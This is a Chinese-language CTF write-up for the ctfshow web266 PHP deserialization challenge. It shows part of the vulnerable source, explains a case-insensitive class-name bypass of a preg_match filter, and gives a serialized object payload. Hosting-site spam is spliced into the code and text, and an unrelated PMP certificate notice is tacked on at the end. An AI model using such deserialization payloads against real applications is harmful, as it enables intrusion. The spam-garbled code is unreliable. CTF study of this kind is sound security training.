ctfshow web266
username=$u;
$this->password=$p;
}
public function login(){
return $this->username===$this->password;
}
public function __toString(){
return $this->username;
}
public function __destruct(){
服务器托管网 global $flag;
echo $flag;
}
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
throw new Exception("Error $ctfshowo",1);
}
?>本题利用的是php的类目和方法名不缺分大小写特性(变量名敏感),利用大写类名绕过preg_match检查。
但是本题也有一个坑点,payload不能再urlencode,因为是通过php://服务器托管网input提交,并不会在后台进行urldecode,如果换作get提交则可用urlencode后再提交
payload:
O:7:”Ctfshow”:2:{s:8:”username”;s:6:”xxxxxx”;s:8:”password”;s:6:”xxxxxx”;}
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
机房租用,北京机房租用,IDC机房托管, http://www.fwqtg.net
北京人社局发布了《北京市境外职业资格认可目录(3.0版)》,PMP证书在目录之中,持证人员与在京单位建立人事劳动关系可办理工作居住证,对应中级职称。 以下是通知原文: 北京市人力资源和社会保障局 北京市人才工作局 关于印发《北京市境外职业资格认可目录(3.0版…
